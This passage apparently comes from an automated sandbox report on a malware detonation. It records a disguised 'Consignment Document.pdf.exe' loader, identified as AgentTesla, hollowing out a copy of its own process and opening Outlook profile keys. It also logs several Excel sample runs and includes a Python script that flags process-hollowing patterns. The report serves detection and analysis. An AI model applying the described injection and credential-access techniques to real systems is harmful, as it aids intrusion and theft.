Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
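The SetThreadContext and WriteProcessMemory tables above show PID 268 writing into PID 2744 nine times and then changing its thread context, with both processes running the same image. That is the process-hollowing (RunPE) pattern: a loader starts a second copy of its own executable, overwrites it with the unpacked payload and redirects the main thread into it, which is how the AgentTesla payload ends up in the memory/2744-* regions listed under Files. Compare behavioral20, where the 64-bit C:\Windows\system32\rundll32.exe writes three times into the 32-bit C:\Windows\SysWOW64\rundll32.exe it launched for $PLUGINSDIR\System.dll and no thread-context change follows. The Python below is an added example, not part of the report: it parses the signature rows exactly as printed (copied verbatim, with the spaces in the image path handled by anchoring on the drive letter) and flags only write-then-SetThreadContext pairs, so the rundll32 pair is left alone. The rule and the output fields are the example's own.

```python
import re
from collections import defaultdict

# Signature rows copied from this report: the SetThreadContext and WriteProcessMemory tables of
# behavioral5 (Consignment Document.pdf.exe) and the WriteProcessMemory table of behavioral20
# (64-bit rundll32 relaunching the 32-bit rundll32). Column layout: Description Indicator Process Target.
ROWS = r"""
PID 268 set thread context of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 268 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
PID 4180 wrote to memory of 3924 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4180 wrote to memory of 3924 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4180 wrote to memory of 3924 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
"""

# Image paths may contain spaces, so the split between Process and Target is the next " X:\".
ROW_RE = re.compile(
    r"^PID (?P<src>\d+) (?P<action>set thread context of|wrote to memory of) (?P<dst>\d+) "
    r"N/A (?P<src_image>[A-Za-z]:\\.*?) (?P<dst_image>[A-Za-z]:\\.*)$"
)


def parse_rows(text):
    events = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line)
        if m:
            e = m.groupdict()
            e["src"], e["dst"] = int(e["src"]), int(e["dst"])
            events.append(e)
    return events


def cross_process_writes(text):
    """(source pid, target pid) -> number of WriteProcessMemory calls recorded."""
    writes = defaultdict(int)
    for e in parse_rows(text):
        if e["action"] == "wrote to memory of":
            writes[(e["src"], e["dst"])] += 1
    return dict(writes)


def hollowing_candidates(text):
    """Flag a target that one process wrote into and also re-pointed with SetThreadContext.
    A parent that only writes into a child it just created (rundll32 -> rundll32 here) is not flagged."""
    writes = cross_process_writes(text)
    found = []
    for e in parse_rows(text):
        if e["action"] != "set thread context of":
            continue
        pair = (e["src"], e["dst"])
        if writes.get(pair, 0) == 0:
            continue
        found.append({
            "source_pid": e["src"],
            "target_pid": e["dst"],
            "memory_writes": writes[pair],
            "same_image": e["src_image"].lower() == e["dst_image"].lower(),   # self-hollowing shape
            "image": e["dst_image"],
        })
    return found


if __name__ == "__main__":
    print(cross_process_writes(ROWS))
    print(hollowing_candidates(ROWS))
```

On a live host the same rule maps onto Sysmon Event ID 10 (process access with PROCESS_VM_WRITE and thread rights) followed by a thread-context change on the same target; the sandbox rows are just that sequence already correlated by PID.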

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"

C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe

"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"

Network

N/A

Files

memory/268-0-0x000000007412E000-0x000000007412F000-memory.dmp

memory/268-1-0x0000000000DC0000-0x0000000000E92000-memory.dmp

memory/268-2-0x0000000074120000-0x000000007480E000-memory.dmp

memory/268-3-0x0000000000380000-0x000000000038E000-memory.dmp

memory/268-4-0x000000007412E000-0x000000007412F000-memory.dmp

memory/268-5-0x0000000074120000-0x000000007480E000-memory.dmp

memory/268-6-0x00000000056B0000-0x000000000576C000-memory.dmp

memory/268-7-0x0000000000710000-0x000000000074C000-memory.dmp

memory/2744-8-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2744-12-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2744-20-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2744-18-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2744-14-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2744-13-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2744-16-0x0000000000400000-0x000000000043C000-memory.dmp

memory/2744-11-0x0000000000400000-0x000000000043C000-memory.dmp

memory/268-21-0x0000000074120000-0x000000007480E000-memory.dmp

memory/2744-22-0x0000000074120000-0x000000007480E000-memory.dmp

memory/2744-23-0x0000000074120000-0x000000007480E000-memory.dmp

memory/2744-24-0x0000000074120000-0x000000007480E000-memory.dmp

memory/2744-25-0x0000000074120000-0x000000007480E000-memory.dmp

memory/2744-26-0x0000000074120000-0x000000007480E000-memory.dmp

memory/2744-27-0x0000000074120000-0x000000007480E000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

148s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\XSG8996380.xls"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\XSG8996380.xls"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 105.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/3792-5-0x00007FFA78C10000-0x00007FFA78C20000-memory.dmp

memory/3792-6-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-9-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-17-0x00007FFA76890000-0x00007FFA768A0000-memory.dmp

memory/3792-22-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-21-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-23-0x00007FFA76890000-0x00007FFA768A0000-memory.dmp

memory/3792-20-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-19-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-18-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-16-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-15-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-14-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-13-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-12-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-11-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-10-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-8-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-7-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-4-0x00007FFA78C10000-0x00007FFA78C20000-memory.dmp

memory/3792-3-0x00007FFA78C10000-0x00007FFA78C20000-memory.dmp

memory/3792-2-0x00007FFA78C10000-0x00007FFA78C20000-memory.dmp

memory/3792-1-0x00007FFA78C10000-0x00007FFA78C20000-memory.dmp

memory/3792-0-0x00007FFAB8C2D000-0x00007FFAB8C2E000-memory.dmp

memory/3792-47-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-46-0x00007FFAB8C2D000-0x00007FFAB8C2E000-memory.dmp

memory/3792-48-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

memory/3792-49-0x00007FFAB8B90000-0x00007FFAB8D85000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 0eb5b1247d963e4d110d0c614b463f6c
SHA1 ba07bcc5e1e4ebdcf361b1311211c21231a3b0c8
SHA256 d54c96240493dbcaa2ffc9a4586ceac048adce2aee33001f791b6bfa02f46b1a
SHA512 92b5fc0a6864564acdd6cbdd6c33dfaa92081a8060ccd421491b408345223b9b2e8204d028bda679875e76a5241d4d47cf1a584c75bbb38c30e64d3f13d18fdf

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

147s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\00496083.xls"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\00496083.xls"

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 28.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 67.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

memory/904-5-0x00007FFC2F330000-0x00007FFC2F340000-memory.dmp

memory/904-4-0x00007FFC2F330000-0x00007FFC2F340000-memory.dmp

memory/904-12-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-11-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-14-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-13-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-10-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-9-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-15-0x00007FFC2D1D0000-0x00007FFC2D1E0000-memory.dmp

memory/904-16-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-8-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-7-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-17-0x00007FFC2D1D0000-0x00007FFC2D1E0000-memory.dmp

memory/904-18-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-6-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-3-0x00007FFC2F330000-0x00007FFC2F340000-memory.dmp

memory/904-2-0x00007FFC2F330000-0x00007FFC2F340000-memory.dmp

memory/904-1-0x00007FFC6F34D000-0x00007FFC6F34E000-memory.dmp

memory/904-0-0x00007FFC2F330000-0x00007FFC2F340000-memory.dmp

memory/904-34-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

memory/904-35-0x00007FFC6F34D000-0x00007FFC6F34E000-memory.dmp

memory/904-36-0x00007FFC6F2B0000-0x00007FFC6F4A5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 685657fb7094a8866ed6f5e2af57c914
SHA1 cd68e6a7b50e91b41863b1cbb4227510d8899bbe
SHA256 ca42f861122e74fd6e5aba72eb91a303f1b3b21bb9251917a0e574fc22a051d0
SHA512 af36cfdbe692c588d7c362ac3c4b40fc7f6d6d18b5392a16b45e9330c4d09575e9343e4509f74ee234fb5065fe29c7515d5721d5db6fbcff33ded971ae2cb962

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4544 wrote to memory of 1420 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4544 wrote to memory of 1420 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4544 wrote to memory of 1420 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\Math.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1420 -ip 1420

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 608

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 25.77.123.92.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

153s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\I055170_06975755.xls"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\IoC\I055170_06975755.xls"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
FR 52.109.68.129:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 129.68.109.52.in-addr.arpa udp
US 8.8.8.8:53 104.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 123.10.44.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 100.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 213.80.50.20.in-addr.arpa udp

Files

memory/2256-1-0x00007FF8DAE2D000-0x00007FF8DAE2E000-memory.dmp

memory/2256-0-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp

memory/2256-2-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp

memory/2256-5-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp

memory/2256-4-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp

memory/2256-3-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp

memory/2256-8-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-9-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-10-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-12-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-11-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-13-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp

memory/2256-7-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-14-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-16-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-18-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp

memory/2256-19-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-21-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-20-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-17-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-15-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-6-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-47-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

memory/2256-48-0x00007FF8DAE2D000-0x00007FF8DAE2E000-memory.dmp

memory/2256-49-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 7c52d81cb1d43b12fd2df4b1fef0efc6
SHA1 514243668197d913f3789e0020dbf75271579dbe
SHA256 ecdba0b3ff658beebd94f387d9b5338a63953e594a49868b6bf69ae34e1545ad
SHA512 804b81b574e8f68bf0a7425a0b554c49fde7fa712c61c6d8dddedecafb199bdb7d38b7a9ba645666a20d6f30f65e39100f25bd417560fe288a2f392d04bd5ccd

Analysis: behavioral30

Detonation Overview

Submitted

2024-11-21 20:24

Reported

2024-11-21 20:26

Platform

win7-20240729-en

Max time kernel

60s

Max time network

18s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\XSG8996380.xls

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\XSG8996380.xls

Network

N/A

Files

memory/1172-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1172-1-0x000000007337D000-0x0000000073388000-memory.dmp

memory/1172-2-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-7-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-4-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-13-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-12-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-11-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-10-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-9-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/1172-8-0x00000000006A0000-0x00000000007A0000-memory.dmp

